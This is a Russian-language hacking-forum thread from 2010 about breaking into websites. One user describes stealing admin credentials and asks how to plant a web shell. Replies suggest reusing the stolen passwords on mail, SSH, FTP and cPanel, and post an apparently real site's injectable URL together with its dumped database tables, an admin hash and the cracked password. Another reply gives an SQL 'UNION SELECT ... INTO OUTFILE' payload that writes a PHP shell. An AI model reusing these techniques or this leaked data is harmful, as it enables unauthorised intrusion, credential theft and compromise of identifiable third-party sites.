06.10.2010, 06:47
|
|
Reservists Of Antichat - Level 6
Регистрация: 07.07.2009
Сообщений: 324
С нами:
8866466
Репутация:
564
|
|
Сообщение от GroM88
Выдрал лоигины и пассы админов на отдном сайте...
Попал в админку) в админке написанно Extasy CMS for site.ru
Нужно как то залить шелл, все что там нашол, это то что можно выполнить sql запрос
и доступен html
мб как то можно залить шел с помощью sql запроса?
кроме совета d1v попробуй эти логины пароли к mail/pma/ssh/ftp/cpanel/etc...
__________________
Никогда не бойся делать то, что ты не умеешь. Помни, ковчег был построен любителем. "Титаник" - проффесионалами.
|
|
|
06.10.2010, 07:09
|
|
Reservists Of Antichat - Level 6
Регистрация: 07.07.2009
Сообщений: 324
С нами:
8866466
Репутация:
564
|
|
Сообщение от pinch
http://www.yakutproekt.ru/news.php?id=14517'
вот это надо ....
БД
Сообщение от None
master
tempdb
model
msdb
telecom
zaokolmi
zags
р–master
Таблы с БД zaokolmi
Сообщение от None
dtproperties
foto_catalog
auto_catalog
admin
pwd name
009091b3166dcbe1aa6202a97bcda08a zao
пароль от хеша 123456 вроде
Сайты на сервере(ReverseIP): больше 50
кстати там можно и rdp поднять если прав хватит... завтра поковыряюсь.
__________________
Никогда не бойся делать то, что ты не умеешь. Помни, ковчег был построен любителем. "Титаник" - проффесионалами.
|
|
|
|
06.10.2010, 09:26
|
|
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
С нами:
8638130
Репутация:
54
|
|
shell_code плиииз запросы в личку
|
|
|
|
06.10.2010, 18:48
|
|
Новичок
Регистрация: 04.11.2009
Сообщений: 4
С нами:
8693835
Репутация:
0
|
|
Сообщение от GroM88
Выдрал лоигины и пассы админов на отдном сайте...
Попал в админку) в админке написанно Extasy CMS for site.ru
Нужно как то залить шелл, все что там нашол, это то что можно выполнить sql запрос
и доступен html
мб как то можно залить шел с помощью sql запроса?
site?id=-1' UNION SELECT 1,2,3,'',5,6 INTO OUTFILE '1.php' --
Остается только найти полный путь к корню сайта на сервере и дописать его перед 1.php.
и да Требуются привилегии FILE
|
|
|
|
06.10.2010, 19:35
|
|
Познающий
Регистрация: 24.03.2009
Сообщений: 54
С нами:
9017758
Репутация:
13
|
|
Сообщение от GroM88
Выдрал лоигины и пассы админов на отдном сайте...
Попал в админку) в админке написанно Extasy CMS for site.ru
Нужно как то залить шелл, все что там нашол, это то что можно выполнить sql запрос
и доступен html
мб как то можно залить шел с помощью sql запроса?
|
|
|
|
06.10.2010, 20:45
|
|
Reservists Of Antichat - Level 6
Регистрация: 07.07.2009
Сообщений: 324
С нами:
8866466
Репутация:
564
|
|
а d1v что написал то ? =\
__________________
Никогда не бойся делать то, что ты не умеешь. Помни, ковчег был построен любителем. "Титаник" - проффесионалами.
|
|
|
|
07.10.2010, 02:42
|
|
Новичок
Регистрация: 03.12.2006
Сообщений: 24
С нами:
10230151
Репутация:
7
|
|
Подскажите программку сканирования и сохранения заданного диапазона интернет странц на сайте, например есть сайт http://site.com?112 и http://site.com?5000 можно ли отсканировать заданный диапазон с записью результатов, ссори если наивный вопрос.
|
|
|
|
07.10.2010, 03:07
|
|
Новичок
Регистрация: 19.01.2007
Сообщений: 1
С нами:
10162238
Репутация:
5
|
|
Что в вашем понимании "отсканировать"? Вообще скрипт нужно сделать (мне по душе перл).
|
|
|
|
07.10.2010, 10:51
|
|
Новичок
Регистрация: 23.08.2009
Сообщений: 1
С нами:
8798520
Репутация:
0
|
|
Ужасно глупый вопрос.
Если я пытаюсь найти XSS и вдруг мой браузер говорит мне, что обнаружена попытка проведения XSS атаки, это значит, что я все таки нашел что то и мой браузер это заблокировал и выдал сообщение?
В моем браузере отключены скритпы.
|
|
|
|
07.10.2010, 11:04
|
|
Участник форума
Регистрация: 17.04.2010
Сообщений: 221
С нами:
8456912
Репутация:
17
|
|
Покажи ссылку.
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
